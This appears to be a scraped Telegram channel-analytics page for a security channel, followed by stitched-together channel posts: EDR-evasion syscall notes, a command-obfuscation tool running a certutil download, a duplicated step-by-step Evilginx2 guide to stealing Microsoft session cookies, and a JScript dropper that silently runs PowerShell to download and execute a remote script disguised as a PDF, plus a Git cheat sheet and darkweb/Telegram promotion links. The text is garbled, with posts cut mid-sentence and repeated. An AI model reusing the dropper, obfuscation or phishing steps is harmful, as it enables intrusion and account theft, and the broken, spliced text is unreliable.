All Security Engineering Courses
This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmark me!
نمایش بیشتر📈 تحلیل کانال تلگرام All Security Engineering Courses
کانال All Security Engineering Courses (@allsecurityengineeringcourses) در بخش زبانی انگلیسی بازیگری فعال است. در حال حاضر جامعه شامل 18 787 مشترک است و جایگاه 7 170 را در دسته فناوری و برنامهها و رتبه 35 989 را در منطقه روسيا دارد.
📊 شاخصهای مخاطب و پویایی
از زمان ایجاد در невідомо، پروژه رشد سریعی داشته و 18 787 مشترک جذب کرده است.
بر اساس آخرین دادهها در تاریخ 11 ژوئن, 2026، کانال فعالیت پایداری دارد. در ۳۰ روز گذشته تغییر اعضا برابر 133 و در ۲۴ ساعت گذشته برابر 11 بوده و همچنان دسترسی گستردهای حفظ شده است.
- وضعیت تأیید: تأیید نشده
- نرخ تعامل (ER): میانگین تعامل مخاطب 9.50% است و در ۲۴ ساعت نخست پس از انتشار، محتوا معمولاً 3.09% واکنش نسبت به کل مشترکان کسب میکند.
- دسترسی پستها: هر پست به طور میانگین 1 784 بازدید دریافت میکند. در اولین روز معمولاً 580 بازدید جمعآوری میشود.
- واکنشها و تعامل: مخاطبان بهطور فعال حمایت میکنند؛ میانگین واکنش به هر پست 2 است.
- علایق موضوعی: محتوا بر موضوعات کلیدی مانند git, strace, github, linux, docker تمرکز دارد.
📝 توضیح و سیاست محتوایی
نویسنده این فضا را محل بیان دیدگاههای شخصی توصیف میکند:
“This channel is being updated often with older than 2020 courses, ebooks, videos, code, etc. to be used responsibly by everyone in CyberSecurity in an ethical manner. Lots of content is being downloaded from other channels or forwarded here. Bookmar...”
به لطف بهروزرسانیهای پرتکرار (آخرین داده در تاریخ 12 ژوئن, 2026)، کانال همواره بهروز و دارای دسترسی بالاست. تحلیلها نشان میدهد مخاطبان بهطور فعال با محتوا تعامل دارند و آن را به نقطه اثرگذاری مهم در دسته فناوری و برنامهها تبدیل کردهاند.
K8_SYSCALL("ZwOpenProcess", ...) instead of NtOpenProcess.
You have built a system that :
1 - Does not scan .text (Sorting Hat logic on Exports).
2 - Does not execute syscall locally (Lateral Gadget execution).
3 - Does not leave traces (Clean Call Stacks).Install-Module -Name Invoke-ArgFuscator
Import-Module Invoke-ArgFuscator
Invoke-ArgFuscator -Command 'certutil /f /urlcache https://www.example.org/ homepage.txt'
Invoke-ArgFuscator -InputFile path\to\file.json
😹 Offline version
#windows #obfuscator #redteam
✈️ Join Us For More....
🔥Telegram🔥:
https://t.me/SuBoXoneSoCiety
☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion
🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029Vb7WAkz4tRrkdnGzzy25https://login.fakemicrosoft.com . The victim's browser sends a request to the Evilginx2 server, thinking it is the login page.
2. The Proxy Request (Step 2) 📶: Instead of serving a fake static page, the Evilginx2 server silently forwards that request to the real Microsoft login URL (https://login.microsoftonline.com).
3. Fetching the Real Site (Step 3) ™️🌐 : Microsoft's server receives the request. Thinking it's a normal user, it responds by sending the code for the actual login page back to the Evilginx2 server.
4. Displaying the Trap (Step 4) 🔼🔽: Evilginx2 takes that real login page and serves it to the victim.
Crucial Detail: The victim sees the exact real login page because it is the real code, just served from the wrong domain (fakemicrosoft.com).
5. The Interception (Step 5) 💻 : The victim enters their username and password. These credentials are sent to the Evilginx2 server first, not Microsoft. The attacker now captures the password.
6. The Relay (Step 6)👊 : Evilginx2 immediately uses those stolen credentials to log in to the real Microsoft server on the backend.
Note: If MFA (2FA) were required, Evilginx would prompt the user for the code here, capture it, and relay that too (this is the "Real-Time" aspect).
7. The Theft (Step 7 - The "Gold") ✅™️ : Microsoft accepts the valid credentials and replies with a Session Cookie (the digital token that proves you are logged in). Evilginx2 captures and saves this cookie.
This is the main goal. With this cookie, the attacker can open their own browser, inject the cookie, and access the victim's account without needing the password or MFA again.
8. The Clean Exit (Step 8) 💻🏃♂️ : To avoid raising suspicion, Evilginx2 finally redirects the victim to a totally different website (or the actual Microsoft dashboard). The victim thinks they just logged in normally, or perhaps that the page glitched, while the attacker now has full access to the account.https://login.fakemicrosoft.com . The victim's browser sends a request to the Evilginx2 server, thinking it is the login page.
2. The Proxy Request (Step 2) 📶: Instead of serving a fake static page, the Evilginx2 server silently forwards that request to the real Microsoft login URL (https://login.microsoftonline.com).
3. Fetching the Real Site (Step 3) ™️🌐 : Microsoft's server receives the request. Thinking it's a normal user, it responds by sending the code for the actual login page back to the Evilginx2 server.
4. Displaying the Trap (Step 4) 🔼🔽: Evilginx2 takes that real login page and serves it to the victim.
Crucial Detail: The victim sees the exact real login page because it is the real code, just served from the wrong domain (fakemicrosoft.com).
5. The Interception (Step 5) 💻 : The victim enters their username and password. These credentials are sent to the Evilginx2 server first, not Microsoft. The attacker now captures the password.
6. The Relay (Step 6)👊 : Evilginx2 immediately uses those stolen credentials to log in to the real Microsoft server on the backend.
Note: If MFA (2FA) were required, Evilginx would prompt the user for the code here, capture it, and relay that too (this is the "Real-Time" aspect).
7. The Theft (Step 7 - The "Gold") ✅™️ : Microsoft accepts the valid credentials and replies with a Session Cookie (the digital token that proves you are logged in). Evilginx2 captures and saves this cookie.
This is the main goal. With this cookie, the attacker can open their own browser, inject the cookie, and access the victim's account without needing the password or MFA again.
8. The Clean Exit (Step 8) 💻🏃♂️ : To avoid raising suspicion, Evilginx2 finally redirects the victim to a totally different website (or the actual Microsoft dashboard). The victim thinks they just logged in normally, or perhaps that the page glitched, while the attacker now has full access to the account.ghi = new ActiveXObject('Shell.Application');
ghi['ShellExecute']("powershell", '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (IRM https://decjan2026.blogspot.com/////////nipoli.pdf); Start-Sleep -Seconds 17', "", "open", 0);
🔎 Step-by-Step What It Does:
1️⃣Creates Shell.Application COM Object:
▶️new ActiveXObject('Shell.Application') → Instantiates the Windows Shell COM object (progid: Shell.Application).
▶️This is a legitimate object for file operations, but abused here for silent process creation.
2️⃣Obfuscated ShellExecute Call:
▶️Uses bracket notation ['ShellExecute'] instead of dot (minor obfuscation to evade simple string scans).
▶️Launches PowerShell with:
▶️-ep Bypass: Sets ExecutionPolicy to Bypass (ignores script signing restrictions).
▶️-c: Command mode.
3️⃣Inside the PowerShell Command:
▶️Forces TLS 1.2 for downloads: [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
▶️Ensures compatibility with modern HTTPS sites (bypasses older protocol blocks).
▶️ Downloads & Executes Remote Script:
▶️Invoke-Expression (Invoke-RestMethod https://decjan2026.blogspot.com/////////nipoli.pdf)
▶️ Alias: IEX (IRM ...)
▶️ Fetches content from that Blogger URL (masquerading as a ".pdf" to look innocent) and executes it directly in memory.
▶️ Extra slashes (/////////) are ignored by HTTP — classic URL padding to evade filters.
▶️Start-Sleep -Seconds 17: Delays 17 seconds (likely to evade timed sandbox detection or give payload time to run).
4️⃣ Execution Flags:
▶️Window style 0: Runs PowerShell completely hidden (no visible window).
▶️Verb "open": Standard launch.
🧠 Why This Is Sneaky (2025 Context):
▶️Fileless & Silent: No disk writes initially — downloads straight to memory via IRM + IEX.
▶️Legacy Abuse: ActiveXObject + ShellExecute is ancient (IE-era JScript/WScript), but still works in hta/js/vbs dropped via phishing.
▶️PDF Lure: Filename "nipoli.pdf" tricks users/filters into thinking it's a harmless document.
💡 Pro Tip:
This works because many orgs still allow WSH/JScript execution. Disable Windows Script Host via GPO if possible, or use AppLocker/Script Block Logging.git --version # Check if Git is installed
git config --global user.name "Your Name"
git config --global user.email "you@example.com"
3️⃣ Initialize a Repository
git init # Start a new local Git repo 🚀
4️⃣ Basic Workflow
git add . # Stage all changes ➕
git commit -m "Message" # Save a snapshot 💾
git push # Push to remote (like GitHub) ☁️
5️⃣ Check Status & History
git status # See current changes 🚦
git log # View commit history 📜
6️⃣ Clone a Repo
git clone https://github.com/username/repo.git 👯
7️⃣ Branching
git branch feature-x # Create a branch 🌳
git checkout feature-x # Switch to it ↔️
git merge feature-x # Merge with main branch 🤝
8️⃣ Undo Mistakes ↩️
git checkout -- file.txt # Discard changes
git reset HEAD~1 # Undo last commit (local)
git revert <commit_id> # Revert commit (safe)
9️⃣ Working with GitHub
– Create repo on GitHub ✨
– Link local repo:
git remote add origin <repo_url>
git push -u origin main
🔟 Git Best Practices
– Commit often with clear messages ✅
– Use branches for features/bugs 💡
– Pull before push 🔄
– Never commit sensitive data 🔒
💡 Tip: Use GitHub Desktop or VS Code Git UI if CLI feels hard at first.
Join Us For More....
🔥Telegram🔥:
https://t.me/SuBoXoneSoCiety
☠️Darkweb room☠️: http://suboxone2fzkkkeuezwozbbajgqargceo62wdx3f53awty6dv4mzzbad.onion
🫂Whatsapp community🫂 :https://whatsapp.com/channel/0029VaGX1X47T8bP63aZhb22
اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
